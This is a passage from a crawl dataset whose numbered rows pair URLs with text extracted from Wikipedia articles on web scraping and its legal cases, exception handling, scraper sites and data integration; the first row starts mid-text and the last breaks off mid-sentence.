constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
529 | https://en.wikipedia.org/wiki/Web_scraping | https://www.mediawiki.org | The MediaWiki software is used by tens of thousands of websites and thousands of companies and organisations. It powers Wikipedia and also this website. MediaWiki helps you collect and organise knowledge and make it available to people. It's powerful, multilingual, free and open, extensible, customisable, reliable, and free of charge. Find out more and if MediaWiki is right for you. More news |
530 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Error_handling | In computing and computer programming, exception handling is the process of responding to the occurrence of exceptions anomalous or exceptional conditions requiring special processing during the execution of a program. In general, an exception breaks the normal flow of execution and executes a pre-registered exception handler; the details of how this is done depend on whether it is a hardware or software exception and how the software exception is implemented. Exceptions are defined by different layers of a computer system, and the typical layers are CPU-defined interrupts, operating system (OS) defined signals, programming language-defined exceptions. Each layer requires different ways of exception handling although they may be interrelated, e.g. a CPU interrupt could be turned into an OS signal. Some exceptions, especially hardware ones, may be handled so gracefully that execution can resume where it was interrupted. The definition of an exception is based on the observation that each procedure has a precondition, a set of circumstances for which it will terminate "normally". 1 An exception handling mechanism allows the procedure to raise an exception 2 if this precondition is violated, 1 for example if the procedure has been called on an abnormal set of arguments. The exception handling mechanism then handles the exception. 3 The precondition, and the definition of exception, is subjective. The set of "normal" circumstances is defined entirely by the programmer, e.g. the programmer may deem division by zero to be undefined, hence an exception, or devise some behavior such as returning zero or a special "ZERO DIVIDE" value (circumventing the need for exceptions). 4 Common exceptions include an invalid argument (e.g. value is outside of the domain of a function), 5 an unavailable resource (like a missing file, 6 a network drive error, 7 or out-of-memory errors 8 ), or that the routine has detected a normal condition that requires special handling, e.g., attention, end of file. 9 Social pressure is a major influence on the scope of exceptions and use of exception-handling mechanisms, i.e. "examples of use, typically found in core libraries, and code examples in technical books, magazine articles, and online discussion forums, and in an organization’s code standards". 10 Exception handling solves the semipredicate problem, in that the mechanism distinguishes normal return values from erroneous ones. In languages without built-in exception handling such as C, routines would need to signal the error in some other way, such as the common return code and errno pattern. 11 Taking a broad view, errors can be considered to be a proper subset of exceptions, 12 and explicit error mechanisms such as errno can be considered (verbose) forms of exception handling. 11 The term "exception" is preferred to "error" because it does not imply that anything is wrong - a condition viewed as an error by one procedure or programmer may not be viewed that way by another. 13 The term "exception" may be misleading because its connotation of "anomaly" indicates that raising an exception is abnormal or unusual, 14 when in fact raising the exception may be a normal and usual situation in the program. 13 For example, suppose a lookup function for an associative array throws an exception if the key has no value associated. Depending on context, this "key absent" exception may occur much more often than a successful lookup. 15 The first hardware exception handling was found in the UNIVAC I from 1951. Arithmetic overflow executed two instructions at address 0 which could transfer control or fix up the result. 16 Software exception handling developed in the 1960s and 1970s. Exception handling was subsequently widely adopted by many programming languages from the 1980s onward. There is no clear consensus as to the exact meaning of an exception with respect to hardware. 17 From the implementation point of view, it is handled identically to an interrupt: the processor halts execution of the current program, looks up the interrupt handler in the interrupt vector table for that exception or interrupt condition, saves state, and switches control. Exception handling in the IEEE 754 floating-point standard refers in general to exceptional conditions and defines an exception as "an event that occurs when an operation on some particular operands has no outcome suitable for every reasonable application. That operation might signal one or more exceptions by invoking the default or, if explicitly requested, a language-defined alternate handling. By default, an IEEE 754 exception is resumable and is handled by substituting a predefined value for different exceptions, e.g. infinity for a divide by zero exception, and providing status flags for later checking of whether the exception occurred (see C99 programming language for a typical example of handling of IEEE 754 exceptions). An exception-handling style enabled by the use of status flags involves: first computing an expression using a fast, direct implementation; checking whether it failed by testing status flags; and then, if necessary, calling a slower, more numerically robust, implementation. 18 The IEEE 754 standard uses the term "trapping" to refer to the calling of a user-supplied exception-handling routine on exceptional conditions, and is an optional feature of the standard. The standard recommends several usage scenarios for this, including the implementation of non-default pre-substitution of a value followed by resumption, to concisely handle removable singularities. 18 19 20 The default IEEE 754 exception handling behaviour of resumption following pre-substitution of a default value avoids the risks inherent in changing flow of program control on numerical exceptions. For example, the 1996 Cluster spacecraft launch ended in a catastrophic explosion due in part to the Ada exception handling policy of aborting computation on arithmetic error. William Kahan claims the default IEEE 754 exception handling behavior would have prevented this. 19 Front-end web development frameworks, such as React and Vue, have introduced error handling mechanisms where errors propagate up the user interface (UI) component hierarchy, in a way that is analogous to how errors propagate up the call stack in executing code. 21 22 Here the error boundary mechanism serves as an analogue to the typical try-catch mechanism. Thus a component can ensure that errors from its child components are caught and handled, and not propagated up to parent components. For example, in Vue, a component would catch errors by implementing errorCaptured When used like this in markup: The error produced by the child component is caught and handled by the parent component. 23 |
531 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-11 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
532 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Scraper_site | A scraper site is a website that copies content from other websites using web scraping. The content is then mirrored with the goal of creating revenue, usually through advertising and sometimes by selling user data. Scraper sites come in various forms: Some provide little if any material or information and are intended to obtain user information such as e-mail addresses to be targeted for spam e-mail. Price aggregation and shopping sites access multiple listings of a product and allow a user to rapidly compare the prices. Search engines such as Google could be considered a type of scraper site. Search engines gather content from other websites, save it in their own databases, index it and present the scraped content to the search engines' own users. The majority of content scraped by search engines is copyrighted. 1 The scraping technique has been used on various dating websites as well. These sites often combine their scraping activities with facial recognition. 2 3 4 5 6 7 8 9 10 11 excessive citations Scraping is also used on general image analysis (recognition) websites, as well as websites specifically made to identify images of crops with pests and diseases. 12 13 Some scraper sites are created to make money by using advertising programs. In such case, they are called Made for AdSense sites or MFA. This derogatory term refers to websites that have no redeeming value except to lure visitors to the website for the sole purpose of clicking on advertisements. 14 Made for AdSense sites are considered search engine spam that dilute the search results with less-than-satisfactory search results. The scraped content is redundant compared to content shown by the search engine under normal circumstances, had no MFA website been found in the listings. Some scraper sites link to other sites in order to improve their search engine ranking through a private blog network. Prior to Google's update to its search algorithm known as Panda, a type of scraper site known as an auto blog was quite common among black-hat marketers who used a method known as spamdexing. Scraper sites may violate copyright law. Even taking content from an open content site can be a copyright violation, if done in a way which does not respect the license. For instance, the GNU Free Documentation License (GFDL) 15 and Creative Commons ShareAlike (CC-BY-SA) 16 licenses used on Wikipedia 17 require that a republisher of Wikipedia inform its readers of the conditions on these licenses, and give credit to the original author. Depending upon the objective of a scraper, the methods in which websites are targeted differ. For example, sites with large amounts of content such as airlines, consumer electronics, department stores, etc. might be routinely targeted by their competition just to stay abreast of pricing information. Another type of scraper will pull snippets and text from websites that rank high for keywords they have targeted. This way they hope to rank highly in the search engine results pages (SERPs), piggybacking on the original page's page rank. RSS feeds are vulnerable to scrapers. Other scraper sites consist of advertisements and paragraphs of words randomly selected from a dictionary. Often a visitor will click on a pay-per-click advertisement on such site because it is the only comprehensible text on the page. Operators of these scraper sites gain financially from these clicks. Advertising networks claim to be constantly working to remove these sites from their programs, although these networks benefit directly from the clicks generated at this kind of site. From the advertisers' point of view, the networks don't seem to be making enough effort to stop this problem. Scrapers tend to be associated with link farms and are sometimes perceived as the same thing, when multiple scrapers link to the same target site. A frequent target victim site might be accused of link-farm participation, due to the artificial pattern of incoming links to a victim website, linked from multiple scraper sites. Some programmers who create scraper sites may purchase a recently expired domain name to reuse its SEO power in Google. Whole businesses focus on understanding all citation needed expired domains and utilising them for their historical ranking ability exist. Doing so will allow SEOs to utilize the already-established backlinks to the domain name. Some spammers may try to match the topic of the expired site or copy the existing content from the Internet Archive to maintain the authenticity of the site so that the backlinks don't drop. For example, an expired website about a photographer may be re-registered to create a site about photography tips or use the domain name in their private blog network to power their own photography site. Services at some expired domain name registration agents provide both the facility to find these expired domains and to gather the HTML that the domain name used to have on its web site. citation needed |
533 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_integration | Data integration involves combining data residing in different sources and providing users with a unified view of them. 1 This process becomes significant in a variety of situations, which include both commercial (such as when two similar companies need to merge their databases) and scientific (combining research results from different bioinformatics repositories, for example) domains. Data integration appears with increasing frequency as the volume, complexity (that is, big data) and the need to share existing data explodes. 2 It has become the focus of extensive theoretical work, and numerous open problems remain unsolved. Data integration encourages collaboration between internal as well as external users. The data being integrated must be received from a heterogeneous database system and transformed to a single coherent data store that provides synchronous data across a network of files for clients. 3 A common use of data integration is in data mining when analyzing and extracting information from existing databases that can be useful for Business information. 4 Issues with combining heterogeneous data sources are often referred to as information silos, under a single query interface have existed for some time. In the early 1980s, computer scientists began designing systems for interoperability of heterogeneous databases. 5 The first data integration system driven by structured metadata was designed at the University of Minnesota in 1991, for the Integrated Public Use Microdata Series (IPUMS). IPUMS used a data warehousing approach, which extracts, transforms, and loads data from heterogeneous sources into a unique view schema so data from different sources become compatible. 6 By making thousands of population databases interoperable, IPUMS demonstrated the feasibility of large-scale data integration. The data warehouse approach offers a tightly coupled architecture because the data are already physically reconciled in a single queryable repository, so it usually takes little time to resolve queries. 7 The data warehouse approach is less feasible for data sets that are frequently updated, requiring the extract, transform, load (ETL) process to be continuously re-executed for synchronization. Difficulties also arise in constructing data warehouses when one has only a query interface to summary data sources and no access to the full data. This problem frequently emerges when integrating several commercial query services like travel or classified advertisement web applications. As of 2009 update the trend in data integration favored the loose coupling of data 8 and providing a unified query-interface to access real time data over a mediated schema (see Figure 2), which allows information to be retrieved directly from original databases. This is consistent with the SOA approach popular in that era. This approach relies on mappings between the mediated schema and the schema of original sources, and translating a query into decomposed queries to match the schema of the original databases. Such mappings can be specified in two ways: as a mapping from entities in the mediated schema to entities in the original sources (the "Global-as-View" 9 (GAV) approach), or as a mapping from entities in the original sources to the mediated schema (the "Local-as-View" 10 (LAV) approach). The latter approach requires more sophisticated inferences to resolve a query on the mediated schema, but makes it easier to add new data sources to a (stable) mediated schema. As of 2010 update some of the work in data integration research concerns the semantic integration problem. This problem addresses not the structuring of the architecture of the integration, but how to resolve semantic conflicts between heterogeneous data sources. For example, if two companies merge their databases, certain concepts and definitions in their respective schemas like "earnings" inevitably have different meanings. In one database it may mean profits in dollars (a floating-point number), while in the other it might represent the number of sales (an integer). A common strategy for the resolution of such problems involves the use of ontologies which explicitly define schema terms and thus help to resolve semantic conflicts. This approach represents ontology-based data integration. On the other hand, the problem of combining research results from different bioinformatics repositories requires bench-marking of the similarities, computed from different data sources, on a single criterion such as positive predictive value. This enables the data sources to be directly comparable and can be integrated even when the natures of experiments are distinct. 11 As of 2011 update it was determined that current data modeling methods were imparting data isolation into every data architecture in the form of islands of disparate data and information silos. This data isolation is an unintended artifact of the data modeling methodology that results in the development of disparate data models. Disparate data models, when instantiated as databases, form disparate databases. Enhanced data model methodologies have been developed to eliminate the data isolation artifact and to promote the development of integrated data models. 12 One enhanced data modeling method recasts data models by augmenting them with structural metadata in the form of standardized data entities. As a result of recasting multiple data models, the set of recast data models will now share one or more commonality relationships that relate the structural metadata now common to these data models. Commonality relationships are a peer-to-peer type of entity relationships that relate the standardized data entities of multiple data models. Multiple data models that contain the same standard data entity may participate in the same commonality relationship. When integrated data models are instantiated as databases and are properly populated from a common set of master data, then these databases are integrated. Since 2011, data hub approaches have been of greater interest than fully structured (typically relational) Enterprise Data Warehouses. Since 2013, data lake approaches have risen to the level of Data Hubs. (See all three search terms popularity on Google Trends. 13 ) These approaches combine unstructured or varied data into one location, but do not necessarily require an (often complex) master relational schema to structure and define all data in the Hub. Data integration plays a big role in business regarding data collection used for studying the market. Converting the raw data retrieved from consumers into coherent data is something businesses try to do when considering what steps they should take next. 14 Organizations are more frequently using data mining for collecting information and patterns from their databases, and this process helps them develop new business strategies to increase business performance and perform economic analyses more efficiently. Compiling the large amount of data they collect to be stored in their system is a form of data integration adapted for Business intelligence to improve their chances of success. 15 Consider a web application where a user can query a variety of information about cities (such as crime statistics, weather, hotels, demographics, etc.). Traditionally, the information must be stored in a single database with a single schema. But any single enterprise would find information of this breadth somewhat difficult and expensive to collect. Even if the resources exist to gather the data, it would likely duplicate data in existing crime databases, weather websites, and census data. A data-integration solution may address this problem by considering these external resources as materialized views over a virtual mediated schema, resulting in "virtual data integration". This means application-developers construct a virtual schema—the mediated schema—to best model the kinds of answers their users want. Next, they design "wrappers" or adapters for each data source, such as the crime database and weather website. These adapters simply transform the local query results (those returned by the respective websites or databases) into an easily processed form for the data integration solution (see figure 2). When an application-user queries the mediated schema, the data-integration solution transforms this query into appropriate queries over the respective data sources. Finally, the virtual database combines the results of these queries into the answer to the user's query. This solution offers the convenience of adding new sources by simply constructing an adapter or an application software blade for them. It contrasts with ETL systems or with a single database solution, which require manual integration of entire new data set into the system. The virtual ETL solutions leverage virtual mediated schema to implement data harmonization; whereby the data are copied from the designated "master" source to the defined targets, field by field. Advanced data virtualization is also built on the concept of object-oriented modeling in order to construct virtual mediated schema or virtual metadata repository, using hub and spoke architecture. Each data source is disparate and as such is not designed to support reliable joins between data sources. Therefore, data virtualization as well as data federation depends upon accidental data commonality to support combining data and information from disparate data sets. Because of the lack of data value commonality across data sources, the return set may be inaccurate, incomplete, and impossible to validate. One solution is to recast disparate databases to integrate these databases without the need for ETL. The recast databases support commonality constraints where referential integrity may be enforced between databases. The recast databases provide designed data access paths with data value commonality across databases. The theory of data integration 1 forms a subset of database theory and formalizes the underlying concepts of the problem in first-order logic. Applying the theories gives indications as to the feasibility and difficulty of data integration. While its definitions may appear abstract, they have sufficient generality to accommodate all manner of integration systems, 16 including those that include nested relational XML databases 17 and those that treat databases as programs. 18 Connections to particular databases systems such as Oracle or DB2 are provided by implementation-level technologies such as JDBC and are not studied at the theoretical level. Data integration systems are formally defined as a tuple G , S , M displaystyle left langle G,S,M right rangle where G displaystyle G is the global (or mediated) schema, S displaystyle S is the heterogeneous set of source schemas, and M displaystyle M is the mapping that maps queries between the source and the global schemas. Both G displaystyle G and S displaystyle S are expressed in languages over alphabets composed of symbols for each of their respective relations. The mapping M displaystyle M consists of assertions between queries over G displaystyle G and queries over S displaystyle S . When users pose queries over the data integration system, they pose queries over G displaystyle G and the mapping then asserts connections between the elements in the global schema and the source schemas. A database over a schema is defined as a set of sets, one for each relation (in a relational database). The database corresponding to the source schema S displaystyle S would comprise the set of sets of tuples for each of the heterogeneous data sources and is called the source database. Note that this single source database may actually represent a collection of disconnected databases. The database corresponding to the virtual mediated schema G displaystyle G is called the global database. The global database must satisfy the mapping M displaystyle M with respect to the source database. The legality of this mapping depends on the nature of the correspondence between G displaystyle G and S displaystyle S . Two popular ways to model this correspondence exist: Global as View or GAV and Local as View 